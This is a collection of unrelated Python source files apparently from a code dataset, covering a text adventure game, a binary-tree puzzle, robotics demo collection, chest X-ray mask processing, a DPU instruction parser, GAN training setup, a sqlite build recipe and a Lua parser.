elif action == 'shake hand':
health -= 10
print("\nYou clasp the skeleton's hand. Suddenly its grip hardens\n",
"and you cannot break free. You struggle against the hand.\n",
"It loosens its grip and you fall backwards, striking your\n",
"head on the stone floor.\n(health - 10)")
elif action in ('climb stairs', 'climb staircase', 'enter door'):
if door == 'open':
print("\nYou ascend the stairs to the next level.")
exit_room = True
elif door == 'unlocked':
print("\nThe door is still closed.")
else:
print("\nThe door is locked.")
return health,inventory
health,inventory = level_1(health, inventory)
input("Press the enter key to exit.")
| StarcoderdataPython |
3372213 | <filename>morgan_stanley_problems/problem_1.py<gh_stars>0
"""This problem was asked by <NAME>.
In Ancient Greece, it was common to write text with the first line going left to right,
the second line going right to left, and continuing to go back and forth.
This style was called "boustrophedon".
Given a binary tree, write an algorithm to print the nodes in boustrophedon order.
For example, given the following tree:
1
/ \
2 3
/ \ / \
4 5 6 7
You should return [1, 3, 2, 4, 5, 6, 7].
""" | StarcoderdataPython |
3304242 | <filename>ravens_torch/demos.py
# coding=utf-8
# Adapted from Ravens - Transporter Networks, Zeng et al., 2021
# https://github.com/google-research/ravens
"""Data collection script."""
import os
import numpy as np
from absl import app, flags
from ravens_torch import tasks
from ravens_torch.constants import EXPERIMENTS_DIR, ENV_ASSETS_DIR
from ravens_torch.dataset import Dataset
from ravens_torch.environments.environment import Environment
flags.DEFINE_string('assets_root', ENV_ASSETS_DIR, '')
flags.DEFINE_string('data_dir', EXPERIMENTS_DIR, '')
flags.DEFINE_bool('disp', False, '')
flags.DEFINE_bool('shared_memory', False, '')
flags.DEFINE_string('task', 'block-insertion', '')
flags.DEFINE_string('mode', 'test', '')
flags.DEFINE_integer('n', 1000, '')
FLAGS = flags.FLAGS
def main(unused_argv):
# Initialize environment and task.
env = Environment(
FLAGS.assets_root,
disp=FLAGS.disp,
shared_memory=FLAGS.shared_memory,
hz=480)
task = tasks.names[FLAGS.task]()
task.mode = FLAGS.mode
# Initialize scripted oracle agent and dataset.
agent = task.oracle(env)
dataset = Dataset(os.path.join(
FLAGS.data_dir, f'{FLAGS.task}-{task.mode}'))
# Train seeds are even and test seeds are odd.
seed = dataset.max_seed
if seed < 0:
seed = -1 if (task.mode == 'test') else -2
# Collect training data from oracle demonstrations.
while dataset.n_episodes < FLAGS.n:
print(f'Oracle demonstration: {dataset.n_episodes + 1}/{FLAGS.n}')
episode, total_reward = [], 0
seed += 2
np.random.seed(seed)
env.set_task(task)
obs = env.reset()
info = None
reward = 0
for _ in range(task.max_steps):
act = agent.act(obs, info)
# print('Acting...', act)
episode.append((obs, act, reward, info))
obs, reward, done, info = env.step(act)
total_reward += reward
print(f'Total Reward: {total_reward} Done: {done}')
if done:
break
episode.append((obs, None, reward, info))
# Only save completed demonstrations.
if total_reward > 0.99:
dataset.add(seed, episode)
if __name__ == '__main__':
app.run(main)
| StarcoderdataPython |
122661 | <reponame>gyungchan2110/ImageUtils
# In[]
import cv2
import numpy as np
import os
from operator import eq
import random
import matplotlib.pyplot as plt
from skimage import io
import shutil
listBase = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_2_Generated_Data(2k)/Generated_Data_20180201_091700_2Classes"
srcBase = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_1_Basic_Data(2k)/Imgs_OriginalData_2k2k_2Classes"
dstBase = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_2_Generated_Data(2k)/Generated_Data_20180327_151800_2Classes_Original"
levels = ["train", "test", "validation"]
classes = ["Normal", "Abnormal"]
for level in levels:
for classe in classes:
filelistPath = listBase + "/" + level + "/" + classe
for file in os.listdir(filelistPath):
shutil.copy2(srcBase + "/" + classe + "/" + file, dstBase + "/" + level + "/" + classe + "/" + file)
# In[]
import cv2
import matplotlib.pyplot as plt
import csv
import SimpleITK as sitk
import os
from skimage import transform,exposure,io
import numpy as np
metadata = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_1_Basic_Data(2k)/BasicData_MetaFile_Ex.csv"
maskPath = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_1_Basic_Data(2k)/Masks_OriginalData_OriginalSize"
masks = ["Aortic Knob", "Lt Lower CB", "Pulmonary Conus", "Rt Lower CB", "Rt Upper CB", "DAO" , "Carina" , "LAA", "Axis", "Thorax(x)", "Thorax(y)", "Diaphragm", "Rib(9)", "Rib(10)]
f = open(metadata, 'r')
f_reader = csv.reader(f)
for row in f_reader :
translated = row[2]
orignal = row[0] + "/" + row[1] + "/" + row[1] + ".dcm"
if( row[0].fine("Abnormal") >= 0) :
maskbase = maskPath + "/Abnormal/Total"
else
maskbase = maskPath + "/Normal"
img = sitk.ReadImage(orignal)
img = sitk.GetArrayFromImage(img).astype("int16")
print(img.shape)
img = exposure.equalize_hist(img)
img = img[0,:,:]
#print(np.amax(img), np.amin(img))
# if(imshape is not None):
# img = transform.resize(img, imshape)
#
#img = windowing(img, 8000, 3000)
img = img*255
original = np.asarray(img, dtype = "int16")
original = np.expand_dims(original, -1)
lung_mask = "D:/[Data]/[Lung_Segmentation]/WholeDataSetMask/Whole/" + translated + ".png"
mask = cv2.imread(lung_mask, 0)
#original = np.asarray(original, dtype = "uint8")
twok = np.asarray(twok, dtype = "uint8")
#m#ask = np.asarray(mask, dtype = "uint8")
print(twok.shape, original.shape)
_, mask = cv2.threshold(mask, 127, 255, cv2.THRESH_BINARY)
_, contours, _ = cv2.findContours(mask, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
rects = []
for cnt in contours:
rects.append(cv2.boundingRect(cnt))
tcomx = 10
tcomy = 10
bcomx = 10
bcomy = 10
top_x, top_y, bottom_x, bottom_y = 0, 0 ,0, 0
rects.sort()
top_x = min([x for (x, y, w, h) in rects]) - tcomx #26
top_y = min([y for (x, y, w, h) in rects]) - tcomy #26
bottom_x = max([x+w for (x, y, w, h) in rects]) + bcomx #234
bottom_y = max([y+h for (x, y, w, h) in rects]) + bcomy #227
txr = float(top_x) / 1024.
tyr = float(top_y) / 1024.
bxr = float(bottom_x) / 1024.
byr = float(bottom_y) / 1024.
shape = original.shape
otx = int(shape[1] * txr)
oty = int(shape[0] * tyr)
obx = int(shape[1] * bxr)
oby = int(shape[0] * byr)
y_line = (otx + obx) // 2
original = np.stack([original[:,:,0],original[:,:,0],original[:,:,0]], axis = -1)
cv2.rectangle(original, (otx, oty), (obx, oby), color = (0,0,255), thickness = 1)
cv2.rectangle(original, (y_line - 5, oty), (y_line + 5, oby), color = (255,255,0), thickness = 1)
cv2.rectangle(original, (y_line//2 - 5, oty), (y_line//2 + 5, oby), color = (255,255,255), thickness = 1)
for mask in masks :
path = maskbase + "/" + translated + ".png"
mask = cv2.imread(path, 0)
mask = np.asarray(mask, dtype = "uint8")
_, mask = cv2.threshold(mask, 127, 255, cv2.THRESH_BINARY)
_, contours, _ = cv2.findContours(mask, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
cnt = contours[0]
cv2.polylines(original, contours, isClosed = True, color = (255,255,255), thickness = 1)
cv2.imwrite("D:/TestTemp/" + translated + ".png", original)
print(translated)
break
# In[]
import csv
csvFile = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_1_Basic_Data(2k)/Masks_OriginalData_2k2k/Normal/Thorax(x)/xLevel.csv"
f = open(csvFile, 'r', encoding = "utf-8", newline='')
csvReader = csv.reader(f)
for row in csvReader:
print(type(row))
f.close()
# In[]
import numpy as np
Pts = []
Pts.append((37.355891, 127.951228)) # 원주
Pts.append((37.086152, 127.039604)) # 오산
Pts.append((37.337880, 126.811520)) # 안산
Pts.append((37.452699, 126.909778)) # 금천구
Pts.append((37.461455, 126.958009)) # 기숙사
Pts.append((37.461455, 126.958009)) # 기숙사2
Pts.append((37.512161, 126.918398)) # 영등포
Pts.append((40.101099, 360-88.230752))
longitude = []
latitude = []
for pt in Pts :
longitude.append(pt[1])
latitude.append(pt[0])
centerPoint = (np.asarray(latitude).mean(), np.asarray(longitude).mean())
print(centerPoint) | StarcoderdataPython |
1741703 | # List test
l = []
print l
l.append(2)
print l.__len__()
print l
l2 = []
l.append(l2)
print l
print list()
print [1, 2, 3]
| StarcoderdataPython |
3344333 | # Copyright 2021 Xilinx Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .dpuMcParserBase import *
class dpuv4eInstParser(dpuMcParserBase):
def __init__(self):
name = "DPUCVDX8H_ISA1"
super().__init__(name)
self.opcode_table = [
self.inst_desc("LOAD", 0b0000, 5),
self.inst_desc("SAVE", 0b0100, 4),
self.inst_desc("CONV", 0b1000, 5),
self.inst_desc("CONVINIT", 0b1001, 5),
self.inst_desc("DPTWISE", 0b1010, 5),
self.inst_desc("DWINIT", 0b1011, 4),
self.inst_desc("POOLINIT", 0b0110, 3),
self.inst_desc("POOL", 0b1100, 4),
self.inst_desc("ELEWINIT", 0b1101, 2),
self.inst_desc("ELEW", 0b1110, 3),
self.inst_desc("END", 0b0111, 1)
]
class Load(LittleEndianStructure):
_pack_ = 1
_fields_ = [
('bank_addr', c_uint, 13),
('output_channel_num', c_uint, 7),
('dpby', c_uint, 4),
('dpdon', c_uint, 4),
('opcode', c_uint, 4),
('jump_read', c_uint, 16),
('bank_id', c_uint, 8),
('ddr_mode', c_uint, 1),
('pad_idx', c_uint, 5),
('r0', c_uint, 2),
('channel', c_uint, 12),
('mode_avg', c_uint, 2),
('length', c_uint, 10),
('jump_write', c_uint, 8),
('ddr_addr', c_uint, 29),
('reg_id', c_uint, 3),
('jump_read_endl', c_uint, 21),
('pad_end', c_uint, 6),
('pad_start', c_uint, 5)
]
class Save(LittleEndianStructure):
_pack_ = 1
_fields_ = [
('bank_addr', c_uint, 13),
('r0', c_uint, 7),
('dpby', c_uint, 4),
('dpdon', c_uint, 4),
('opcode', c_uint, 4),
('jump_write', c_uint, 16),
('bank_id', c_uint, 8),
('r1', c_uint, 8),
('channel', c_uint, 12),
('r2', c_uint, 2),
('length', c_uint, 10),
('jump_read', c_uint, 8),
('ddr_addr', c_uint, 29),
('reg_id', c_uint, 3)
]
def process(self, mc, _debug=False):
self.debug = _debug
pos = 0
load_img_size = 0
load_para_size = 0
save_size = 0
while (pos < len(mc)):
inst_name, inst_len = self.get_inst(mc, pos, self)
if self.debug:
print("pos: %d/%d, inst: %s " %
(pos, len(mc), inst_name), end="\r")
if inst_name == "LOAD":
l = self.Load()
inst = mc[pos:]
memmove(addressof(l), inst, inst_len)
load_bank_id = l.bank_id
load_len = l.length
load_channel = l.channel + 1
load_jr = l.jump_read+1
inst_load_img_size = 0
inst_load_para_size = 0
if load_bank_id < 16:
inst_load_img_size = load_len * load_jr + load_channel
# print("LOAD_FM:bank_id:%d, load_jr:%d, load_len:%d, load_channel:%d, %d" % \
# (load_bank_id, load_jr, load_len, load_channel, inst_load_img_size))
else:
inst_load_para_size = l.output_channel_num * l.jump_read_endl
# print("LOAD_PARA:bank_id:%d, load_jr:%d, load_len:%d, load_channel:%d, %d" % \
# (load_bank_id, load_jr, load_len, load_channel, inst_load_para_size))
load_img_size += inst_load_img_size
load_para_size += inst_load_para_size
elif inst_name == "SAVE":
s = self.Save()
inst = mc[pos:]
memmove(addressof(s), inst, inst_len)
length_ = s.length + 1
chan_ = s.channel + 1
save_size += (length_ * chan_)
#print("SAVE %d %d" % (length_, chan_))
elif inst_name == "UNKNOW":
load_img_size = 0
load_para_size = 0
save_size = 0
break
else:
pass
pos += inst_len
self.data["load_img_size"] = load_img_size
self.data["load_para_size"] = load_para_size
self.data["save_size"] = save_size
register(dpuv4eInstParser())
| StarcoderdataPython |
1682129 | <reponame>liweileev/SOMGAN
'''
Author: Liweileev
Date: 2022-01-03 17:00:02
LastEditors: Liweileev
LastEditTime: 2022-01-31 01:10:10
'''
import click
import dnnlib
import os
import re
import json
import torch
import tempfile
from training import training_loop
from torch_utils import training_stats
from torch_utils import custom_ops
class UserError(Exception):
pass
def setup_training_loop_kwargs(
gpus = None, # Number of GPUs: <int>, default = 1 gpu
snap = None, # Snapshot interval: <int>, default = 50 ticks
# Dataset.
data = None, # Training dataset (required): <path>
mirror = None, # Augment dataset with x-flips: <bool>, default = False
# Base config.
gamma = None, # Override R1 gamma: <float>
kimg = None, # Override training duration: <int>
batch = None, # Override batch size: <int>
# Discriminator augmentation.
aug = None, # Augmentation mode: 'ada' (default), 'noaug', 'fixed'
num_d = None, # Number of discriminators: <int>, default = 1
topo = None, # Topology constraint type: 'grid' (default), 'triangle'
# Transfer learning.
resume = None, # Load previous network: 'noresume' (default), <file>, <url>
):
args = dnnlib.EasyDict()
# ------------------------------------------
# General options: gpus, snap, metrics
# ------------------------------------------
if gpus is None:
gpus = 1
assert isinstance(gpus, int)
if not (gpus >= 1 and gpus & (gpus - 1) == 0):
raise UserError('--gpus must be a power of two')
args.num_gpus = gpus
if snap is None:
snap = 50
assert isinstance(snap, int)
if snap < 1:
raise UserError('--snap must be at least 1')
args.image_snapshot_ticks = snap
args.network_snapshot_ticks = snap
args.metrics = ['fid50k_full']
# -----------------------------------
# Dataset: data, mirror
# -----------------------------------
assert data is not None
assert isinstance(data, str)
args.training_set_kwargs = dnnlib.EasyDict(class_name='training.dataset.ImageFolderDataset', path=data, xflip=False)
args.data_loader_kwargs = dnnlib.EasyDict(pin_memory=True, num_workers=3, prefetch_factor=2)
try:
training_set = dnnlib.util.construct_class_by_name(**args.training_set_kwargs) # subclass of training.dataset.Dataset
args.training_set_kwargs.resolution = training_set.resolution # be explicit about resolution
desc = training_set.name
del training_set # conserve memory
except IOError as err:
raise UserError(f'--data: {err}')
if num_d is None:
num_d = 1
assert isinstance(num_d, int)
args.num_D = num_d
desc += f'-{num_d:d}D'
assert topo is None or isinstance(topo, str)
if topo is None:
desc += '-grid'
args.topo = 'grid'
else:
desc += '-' + topo
args.topo = topo # custom path or url
if mirror is None:
mirror = False
if mirror:
desc += '-mirror'
args.training_set_kwargs.xflip = True
# ------------------------------------
# Base config: cfg, gamma, kimg, batch
# ------------------------------------
res = args.training_set_kwargs.resolution
fmaps = 1 if res >= 512 else 0.5
lrate = 0.002 if res >= 1024 else 0.0025
default_map = 2
default_kimg = 25000
default_mb = max(min(gpus * min(4096 // res, 32), 64), gpus) # keep gpu memory consumption at bay
default_mbstd = min(default_mb // gpus, 4) # other hyperparams behave more predictably if mbstd group size remains fixed
default_gamma = 0.0002 * (res ** 2) / default_mb # heuristic formula
default_ema = default_mb * 10 / 32
args.G_kwargs = dnnlib.EasyDict(class_name='training.Generators.StyleGenerator.Generator', z_dim=512, w_dim=512, mapping_kwargs=dnnlib.EasyDict(), synthesis_kwargs=dnnlib.EasyDict())
args.D_kwargs = dnnlib.EasyDict(class_name='training.Discriminators.StyleDiscriminator.Discriminator', epilogue_kwargs=dnnlib.EasyDict())
args.G_kwargs.synthesis_kwargs.channel_base = args.D_kwargs.channel_base = int(fmaps * 32768)
args.G_kwargs.synthesis_kwargs.channel_max = args.D_kwargs.channel_max = 512
args.G_kwargs.synthesis_kwargs.num_fp16_res = args.D_kwargs.num_fp16_res = 4 # enable mixed-precision training
args.G_kwargs.synthesis_kwargs.conv_clamp = args.D_kwargs.conv_clamp = 256 # clamp activations to avoid float16 overflow
args.G_kwargs.mapping_kwargs.num_layers = default_map
args.D_kwargs.epilogue_kwargs.mbstd_group_size = default_mbstd
args.G_opt_kwargs = dnnlib.EasyDict(class_name='torch.optim.Adam', lr=lrate, betas=[0,0.99], eps=1e-8)
args.D_opt_kwargs = dnnlib.EasyDict(class_name='torch.optim.Adam', lr=lrate, betas=[0,0.99], eps=1e-8)
args.loss_kwargs = dnnlib.EasyDict(class_name='training.loss.SOMGANLoss', r1_gamma=default_gamma)
args.total_kimg = default_kimg
args.batch_size = default_mb
args.batch_gpu = default_mb // gpus
args.ema_kimg = default_ema
args.ema_rampup = None
if gamma is not None:
assert isinstance(gamma, float)
if not gamma >= 0:
raise UserError('--gamma must be non-negative')
desc += f'-gamma{gamma:g}'
args.loss_kwargs.r1_gamma = gamma
if kimg is not None:
assert isinstance(kimg, int)
if not kimg >= 1:
raise UserError('--kimg must be at least 1')
desc += f'-kimg{kimg:d}'
args.total_kimg = kimg
if batch is not None:
assert isinstance(batch, int)
if not (batch >= 1 and batch % gpus == 0):
raise UserError('--batch must be at least 1 and divisible by --gpus')
desc += f'-batch{batch}'
args.batch_size = batch
args.batch_gpu = batch // gpus
# ---------------------------------------------------
# Discriminator augmentation: aug
# ---------------------------------------------------
if aug is None:
aug = 'ada'
else:
assert isinstance(aug, str)
desc += f'-{aug}'
if aug == 'ada':
args.ada_target = 0.6
bgc = dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1)
args.augment_kwargs = dnnlib.EasyDict(class_name='training.augment.AugmentPipe', **bgc)
desc += f'-ada'
elif aug == 'noaug':
pass
else:
raise UserError(f'--aug={aug} not supported')
# ----------------------------------
# Transfer learning: resume
# ----------------------------------
assert resume is None or isinstance(resume, str)
if resume is None:
resume = 'noresume'
elif resume == 'noresume':
desc += '-noresume'
else:
desc += '-resumecustom'
args.resume_pkl = resume # custom path or url
if resume != 'noresume':
args.ada_kimg = 100 # make ADA react faster at the beginning
args.ema_rampup = None # disable EMA rampup
desc += f'-{gpus:d}gpu'
return desc, args
#----------------------------------------------------------------------------
def subprocess_fn(rank, args, temp_dir):
dnnlib.util.Logger(file_name=os.path.join(args.run_dir, 'log.txt'), file_mode='a', should_flush=True)
# Init torch.distributed.
if args.num_gpus > 1:
init_file = os.path.abspath(os.path.join(temp_dir, '.torch_distributed_init'))
if os.name == 'nt':
init_method = 'file:///' + init_file.replace('\\', '/')
torch.distributed.init_process_group(backend='gloo', init_method=init_method, rank=rank, world_size=args.num_gpus)
else:
init_method = f'file://{init_file}'
torch.distributed.init_process_group(backend='nccl', init_method=init_method, rank=rank, world_size=args.num_gpus)
# Init torch_utils.
sync_device = torch.device('cuda', rank) if args.num_gpus > 1 else None
training_stats.init_multiprocessing(rank=rank, sync_device=sync_device)
if rank != 0:
custom_ops.verbosity = 'none'
# Execute training loop.
training_loop.training_loop(rank=rank, **args)
@click.command()
@click.pass_context
# General options.
@click.option('--outdir', help='Where to save the results', required=True, metavar='DIR')
@click.option('--gpus', help='Number of GPUs to use [default: 1]', type=int, metavar='INT')
@click.option('--snap', help='Snapshot interval [default: 50 ticks]', type=int, metavar='INT')
@click.option('-n', '--dry-run', help='Print training options and exit', is_flag=True)
# Dataset.
@click.option('--data', help='Training data (directory or zip)', metavar='PATH', required=True)
@click.option('--mirror', help='Enable dataset x-flips [default: false]', type=bool, metavar='BOOL')
# Base config.
@click.option('--kimg', help='Override training duration', type=int, metavar='INT')
@click.option('--gamma', help='Override R1 gamma', type=float)
@click.option('--batch', help='Override batch size', type=int, metavar='INT')
# Discriminator augmentation.
@click.option('--aug', help='Augmentation mode [default: ada]', type=click.Choice(['noaug', 'ada', 'fixed']))
@click.option('--num_d', help='Number of discriminators [default: 1', type=int, metavar='INT')
@click.option('--topo', help='Topology constraint type [default: grid]', type=click.Choice(['grid', 'triangle']))
# Transfer learning.
@click.option('--resume', help='Resume training [default: noresume]', metavar='PKL')
def main(ctx, outdir, dry_run, **config_kwargs):
dnnlib.util.Logger(should_flush=True)
# Setup training options.
try:
run_desc, args = setup_training_loop_kwargs(**config_kwargs)
except UserError as err:
ctx.fail(err)
# Pick output directory.
prev_run_dirs = []
if os.path.isdir(outdir):
prev_run_dirs = [x for x in os.listdir(outdir) if os.path.isdir(os.path.join(outdir, x))]
prev_run_ids = [re.match(r'^\d+', x) for x in prev_run_dirs]
prev_run_ids = [int(x.group()) for x in prev_run_ids if x is not None]
cur_run_id = max(prev_run_ids, default=-1) + 1
args.run_dir = os.path.join(outdir, f'{cur_run_id:05d}-{run_desc}')
assert not os.path.exists(args.run_dir)
# Print options.
print()
print('Training options:')
print(json.dumps(args, indent=2))
print()
print(f'Output directory: {args.run_dir}')
print(f'Training data: {args.training_set_kwargs.path}')
print(f'Training duration: {args.total_kimg} kimg')
print(f'Number of GPUs: {args.num_gpus}')
print(f'Number of Discriminators: {args.num_D}')
print(f'Topological constraints of Discriminators: {args.topo}')
print(f'Image resolution: {args.training_set_kwargs.resolution}')
print(f'Dataset x-flips: {args.training_set_kwargs.xflip}')
print()
# Dry run?
if dry_run:
print('Dry run; exiting.')
return
# Create output directory.
print('Creating output directory...')
os.makedirs(args.run_dir)
with open(os.path.join(args.run_dir, 'training_options.json'), 'wt') as f:
json.dump(args, f, indent=2)
# Launch processes.
print('Launching processes...')
torch.multiprocessing.set_start_method('spawn')
with tempfile.TemporaryDirectory() as temp_dir:
if args.num_gpus == 1:
subprocess_fn(rank=0, args=args, temp_dir=temp_dir)
else:
torch.multiprocessing.spawn(fn=subprocess_fn, args=(args, temp_dir), nprocs=args.num_gpus)
if __name__ == "__main__":
main() | StarcoderdataPython |
3242949 | from .base import GnuRecipe
from ..version import Versions
class Sqlite3Recipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(Sqlite3Recipe, self).__init__(*args, **kwargs)
self.sha256 = 'd9d14e88c6fb6d68de9ca0d1f9797477' \
'd82fc3aed613558f87ffbdbbc5ceb74a'
self.name = 'sqlite3'
self.version = '3.24.0'
# Doesn't work because version is not in href
long_version = self.version.replace('.', '') + '000'
self.url = 'https://www.sqlite.org/2018/sqlite-autoconf-%s.tar.gz' % \
long_version
self.version_url = 'https://sqlite.org/changes.html'
self.version_regex = '\d\d\d\d-\d\d-\d\d [(](?P<version>\d+.\d+.\d+)[)]'
self.depends = ['readline']
self.configure_args += [
'--enable-fts5',
'--enable-json1',
'--enable-readline',
'--enable-threadsafe',
'--enable-shared',
'--enable-static',
'--enable-dynamic-extensions'
]
# firefox and QT requires this
self.environment['CFLAGS'] += \
' -DSQLITE_SECURE_DELETE=1' \
' -DSQLITE_ENABLE_UNLOCK_NOTIFY=1' \
' -DSQLITE_ENABLE_DBSTAT_VTAB=1' \
' -DSQLITE_ENABLE_COLUMN_METADATA=1'
# def version_transform(self, v):
# return v[:1] + '.' + v[1:3] + '.' + v[4:]
def get_version_always(self):
return Versions.get_non_link_versions(
self.version_url, self.version_regex)
| StarcoderdataPython |
11888 | <filename>parser.py<gh_stars>0
import lexer
import ast
class Parser:
block_end_tokens = [lexer.TokenKind.KW_RETURN, lexer.TokenKind.EOF,
lexer.TokenKind.KW_END, lexer.TokenKind.KW_ELSE,
lexer.TokenKind.KW_ELSEIF, lexer.TokenKind.KW_UNTIL]
priority_table = {
lexer.TokenKind.OP_ADD: {'left': 10, 'right': 10}, # +
lexer.TokenKind.OP_SUB: {'left': 10, 'right': 10}, # -
lexer.TokenKind.OP_MUL: {'left': 11, 'right': 11}, # *
lexer.TokenKind.OP_MOD: {'left': 11, 'right': 11}, # %
lexer.TokenKind.OP_DIV: {'left': 11, 'right': 11}, # /
lexer.TokenKind.OP_IDIV: {'left': 11, 'right': 11}, # //
lexer.TokenKind.OP_POW: {'left': 14, 'right': 13}, # ^
lexer.TokenKind.OP_BAND: {'left': 6, 'right': 6}, # &
lexer.TokenKind.OP_BOR: {'left': 4, 'right': 4}, # |
lexer.TokenKind.OP_BNOT: {'left': 5, 'right': 5}, # ~
lexer.TokenKind.OP_SHL: {'left': 7, 'right': 7}, # <<
lexer.TokenKind.OP_SHR: {'left': 7, 'right': 7}, # >>
lexer.TokenKind.OP_CONCAT: {'left': 9, 'right': 8}, # ..
lexer.TokenKind.OP_EQ: {'left': 3, 'right': 3}, # ==
lexer.TokenKind.OP_LE: {'left': 3, 'right': 3}, # <=
lexer.TokenKind.OP_LT: {'left': 3, 'right': 3}, # <
lexer.TokenKind.OP_NE: {'left': 3, 'right': 3}, # ~=
lexer.TokenKind.OP_GT: {'left': 3, 'right': 3}, # >
lexer.TokenKind.OP_GE: {'left': 3, 'right': 3}, # >=
lexer.TokenKind.OP_AND: {'left': 2, 'right': 2}, # and
lexer.TokenKind.OP_OR: {'left': 1, 'right': 1}, # or
}
unops = [
lexer.TokenKind.OP_SUB, lexer.TokenKind.OP_NOT,
lexer.TokenKind.OP_LEN, lexer.TokenKind.OP_BNOT
]
binops = [
lexer.TokenKind.OP_ADD, lexer.TokenKind.OP_SUB,
lexer.TokenKind.OP_MUL, lexer.TokenKind.OP_MOD,
lexer.TokenKind.OP_POW, lexer.TokenKind.OP_DIV,
lexer.TokenKind.OP_IDIV, lexer.TokenKind.OP_BAND,
lexer.TokenKind.OP_BOR, lexer.TokenKind.OP_BXOR,
lexer.TokenKind.OP_SHL, lexer.TokenKind.OP_SHR,
lexer.TokenKind.OP_CONCAT, lexer.TokenKind.OP_NE,
lexer.TokenKind.OP_EQ, lexer.TokenKind.OP_LT,
lexer.TokenKind.OP_LE, lexer.TokenKind.OP_GT,
lexer.TokenKind.OP_GE, lexer.TokenKind.OP_AND,
lexer.TokenKind.OP_OR
]
unary_priority = 12
def __init__(self, lex):
self.lex = lex
def parse(self):
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.EOF)
return block
# explist ::= exp {‘,’ exp}
def parse_exp_list(self):
exp_list = []
exp_list.append(self.parse_exp(0)[1])
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
exp_list.append(self.parse_exp(0)[1])
return exp_list
# exp ::= (simpleexp | unop exp) {binop exp}
def parse_exp(self, prev_priority):
token = self.lex.look_ahead()
if token.kind in self.unops:
self.lex.next_token()
op_left = ast.UnopExp(self.parse_exp(self.unary_priority)[1], token.kind)
else:
op_left = self.parse_simple_exp()
bin_op = self.lex.look_ahead().kind
while bin_op in self.binops and self.priority_table[bin_op]['left'] > prev_priority:
bin_op, op_left = self.parse_binop_exp(op_left, self.priority_table[bin_op]['right'])
return bin_op, op_left
# args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_func_args(self):
look_token = self.lex.look_ahead()
exp_list = []
if look_token.kind == lexer.TokenKind.SEP_LPAREN:
self.lex.next_token()
if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RPAREN:
exp_list = self.parse_exp_list()
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
elif look_token.kind == lexer.TokenKind.SEP_LCURLY:
exp_list = [self.parse_table_constructor_exp()]
else:
exp_list = [ast.String(self.lex.next_token_of_kind(lexer.TokenKind.STRING)).data]
return exp_list
# simpleexp ::= nil | false | true | Numeral | LiteralString | ‘...’ |
# functiondef | prefixexp | tableconstructor
def parse_simple_exp(self):
look_token = self.lex.look_ahead()
if look_token.kind == lexer.TokenKind.KW_NIL:
self.lex.next_token()
return ast.NilExp()
elif look_token.kind == lexer.TokenKind.KW_FALSE:
self.lex.next_token()
return ast.BoolConstExp(False)
elif look_token.kind == lexer.TokenKind.KW_TRUE:
self.lex.next_token()
return ast.BoolConstExp(True)
elif look_token.kind == lexer.TokenKind.NUMBER:
return self.parse_number_exp()
elif look_token.kind == lexer.TokenKind.STRING:
self.lex.next_token()
return ast.StringExp(look_token.data)
elif look_token.kind == lexer.TokenKind.VARARG:
self.lex.next_token()
return ast.VarargExp()
elif look_token.kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_func_def_exp()
elif look_token.kind == lexer.TokenKind.SEP_LCURLY:
return self.parse_table_constructor_exp()
else:
return self.parse_prefix_exp()
def parse_func_def_exp(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
func_body_exp = self.parse_func_body_exp(False)
return func_body_exp
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_table_constructor_exp(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LCURLY)
if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RCURLY:
key_list, val_list = self.parse_field_list()
else:
key_list = []
val_list = []
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RCURLY)
return ast.TableConstructorExp(key_list, val_list)
# fieldlist ::= field {fieldsep field} [fieldsep]
# fieldsep ::= ‘,’ | ‘;’
def parse_field_list(self):
key, val = self.parse_field()
key_list = [key]
val_list = [val]
while self.lex.look_ahead().kind in [lexer.TokenKind.SEP_COMMA, lexer.TokenKind.SEP_SEMI]:
self.lex.next_token()
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RCURLY:
break
else:
key, val = self.parse_field()
key_list.append(key)
val_list.append(val)
return key_list, val_list
# field ::= ‘[’ exp ‘]’ ‘=’ exp | Name ‘=’ exp | exp
def parse_field(self):
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_LBRACK:
self.lex.next_token()
key_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK)
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
val_exp = self.parse_exp(0)[1]
return key_exp, val_exp
exp = self.parse_exp(0)[1]
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
if not isinstance(exp, ast.NameExp):
raise Exception("syntax error near '%s'" % token)
self.lex.next_token()
key_exp = ast.StringExp(exp.id_name)
val_exp = self.parse_exp(0)[1]
return key_exp, val_exp
return ast.NilExp(), exp
# binop exp
def parse_binop_exp(self, op_left, prev_priority):
token = self.lex.next_token()
